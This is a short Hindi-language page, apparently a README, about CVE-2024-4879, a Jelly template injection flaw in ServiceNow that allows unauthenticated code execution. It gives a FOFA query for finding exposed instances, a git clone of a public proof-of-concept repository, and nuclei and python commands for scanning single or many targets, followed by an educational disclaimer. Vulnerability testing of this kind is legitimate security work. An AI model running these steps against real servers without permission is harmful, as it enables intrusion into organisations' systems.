
ServiceNow में Jelly टेम्पलेट इंजेक्शन भेद्यता | POC CVE-2024-4879
ServiceNow ने वैंकूवर और वाशिंगटन, डी.सी. नाउ प्लेटफॉर्म रिलीज़ में पहचानी गई एक इनपुट सत्यापन कमजोरी को संबोधित किया है। यह कमजोरी एक अप्रमाणित उपयोगकर्ता को नाउ प्लेटफॉर्म के संदर्भ में दूरस्थ रूप से कोड निष्पादित करने में सक्षम बना सकती है।
FOFA : "server : servicenow"
git clone https://github.com/fa-rrel/CVE-2024-4879.git
cd CVE-2024-4879
एकल लक्ष्य:
nuclei -u https://target.com -t CVE-2024-4879.yaml -nh
एकाधिक लक्ष्य:
nuclei -l urls.txt -t CVE-2024-4879.yaml -nh
python3 CVE-2024-4879.py -i (192.168.1.1)
// अस्वीकरण // बिना अनुमति के हैकिंग अवैध है। यह रिपॉजिटरी पूरी तरह से शैक्षिक उद्देश्यों के लिए है ताकि हम नैतिक हैकिंग और पैठ परीक्षण एवं बग हंटिंग के क्षेत्रों में साइबर-सुरक्षा के बारे में सीख सकें ताकि हम वास्तविक हैकर्स से अपनी रक्षा कर सकें।